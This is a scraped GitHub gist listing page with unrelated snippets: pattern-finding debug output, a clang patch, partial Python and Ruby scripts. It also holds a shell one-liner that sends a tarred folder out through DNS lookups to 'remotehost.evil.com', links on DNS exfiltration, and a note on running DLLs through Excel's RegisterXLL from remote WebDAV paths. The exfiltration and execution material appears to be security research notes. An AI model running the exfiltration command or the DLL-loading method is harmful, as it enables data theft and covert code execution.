>>> a=pattern.findPattern()
found new patterns :
(16, 152, 'z4P4I4u4', 2) P4I4I4u4 (z4P4I4u4){2} (z4P4I4u4){2} (z4P4I4u4){2} (z4P4I4u4){2} (z4P4I4u4){2} (z4P4I4u4){2} (z4P4I4u4){2} (z4P4I4u4){2} (z4P4I4u4){2} (z4P4I4u4){2} z4P4I4u172z4I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12u4z26336
(16, 153, '4P4I4u4z', 2) P4I4I4u4z (4P4I4u4z){2} (4P4I4u4z){2} (4P4I4u4z){2} (4P4I4u4z){2} (4P4I4u4z){2} (4P4I4u4z){2} (4P4I4u4z){2} (4P4I4u4z){2} (4P4I4u4z){2} (4P4I4u4z){2} 4P4I4u172z4I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12u4z26336
(16, 154, 'P4I4u4z4', 2) P4I4I4u4z4 (P4I4u4z4){2} (P4I4u4z4){2} (P4I4u4z4){2} (P4I4u4z4){2} (P4I4u4z4){2} (P4I4u4z4){2} (P4I4u4z4){2} (P4I4u4z4){2} (P4I4u4z4){2
[.. lots of debug ....]
(152, 21, '4u4z4P4I', 19) P4I4I (4u4z4P4I){19} 4u4z4P4I4u4z4P4I4u172z4I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12u4z26336
(152, 22, 'u4z4P4I4', 19) P4I4I4 (u4z4P4I4){19} u4z4P4I4u4z4P4I4u172z4I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12u4z26336
@trolldbois
trolldbois / gist:1291126
Created October 16, 2011 16:48
findPattern in sequence
def findPattern(sequence, elSize=1, minNbGroup=2):
    '''
    returns a regexp grouping repetitive patterns.
    @param sequence: a sequence (str/bstr) with rfind() method.
    @param elSize: the size of each element ( 1 to xxx ) in the sequence.
    @param minNbGroup: the minimum number of repetitions before trying to group the pattern.
    Examples:
    >>> s = 'aaaaa1111bbbccda2a2a2a2a2b1cb1cb1cb1cabcdabcdabcdabcdpooiiiuuuuyyyyy'
@trolldbois
trolldbois / CIndex.cpp
Last active December 11, 2015 00:18
patch for clang.cindex
// FIXME:
// JAL: 2013
// TODO CXString clang_getRecordFieldOffset(CXTranslationUnit TU, CXCursor cursor, int num) {
// TODO CharUnits getAlignment()
int64_t clang_getRecordSize(CXTranslationUnit TU, CXCursor cursor) {
assert(clang_isDeclaration(cursor.kind) && "isDeclaration == FALSE");
assert( ((cursor.kind == CXCursor_StructDecl) or
(cursor.kind == CXCursor_UnionDecl) or
(cursor.kind == CXCursor_ClassDecl)) && "bad declaration kind");
#!/usr/bin/env python
from Crypto.Cipher import AES
import base64
import socket
from Crypto.Hash import MD5
DNS_ZONE = "file.hackwhackandsmack.com"
socket.setdefaulttimeout(1)
#static password can be taken as an input later
#!/usr/bin/ruby
#
# pass a domain (minus the tld) on cli to exclude from the output
#
require 'socket'
class UDPServer
def initialize(port)
@trolldbois
trolldbois / gist:7797236
Created December 4, 2013 23:04
DNS exfiltration by Shell oneliner
#from http://scilspace.com/content/data-exfiltration-over-dns
(tar zcf - localfolder | xxd -p -c 16 | while read line; do host $line.domain.com remotehost.evil.com; done)
@trolldbois
trolldbois / gist:7797357
Created December 4, 2013 23:15
DNS exfiltration
http://wiki.skullsecurity.org/Dnscat
http://theworldsoldestintern.wordpress.com/2012/11/30/dns-exfiltration-udp-53-indicators-of-exfiltration-udp53ioe/
https://github.com/bigsnarfdude/DFTP
http://blog.commandlinekungfu.com/2012/01/episode-164-exfiltration-nation.html
@trolldbois
trolldbois / ExcelXLL.md
Created July 24, 2017 17:47 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, note that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV, and such files are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file; however, there is a security warning. @rxwx has more notes on this here inc